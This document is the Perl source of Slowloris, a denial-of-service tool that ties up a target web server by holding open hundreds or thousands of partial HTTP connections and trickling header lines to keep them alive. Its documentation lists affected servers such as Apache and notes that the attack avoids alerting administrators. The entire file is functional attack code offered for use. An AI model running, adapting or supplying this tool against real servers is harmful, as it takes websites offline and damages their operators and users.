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#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
#./ddos.pl -dns ip -port 80 -num 500
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -timeout flag down to less than 10 seconds but it still may not
build the sockets in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris by llaera
=head1 VERSION
Version 1.0 Stable
=head1 DATE
02/11/2013
=head1 AUTHOR
Laera Loris llaera@outlook.com
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?
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